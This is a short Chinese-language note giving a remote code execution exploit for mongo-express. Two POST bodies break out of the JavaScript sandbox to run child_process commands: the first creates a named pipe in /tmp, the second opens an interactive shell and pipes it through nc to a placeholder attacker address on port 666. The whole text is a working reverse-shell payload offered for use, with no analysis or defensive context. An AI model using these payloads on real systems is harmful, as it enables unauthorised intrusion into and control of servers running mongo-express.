mongo-express远程代码执行,反弹shell代码如下:
POST BODY 1:
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("mkfifo /tmp/f")
POST BODY 2:
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("cat /tmp/f | /bin/sh -i 2>%261 | nc x.x.x.x 666 >/tmp/f")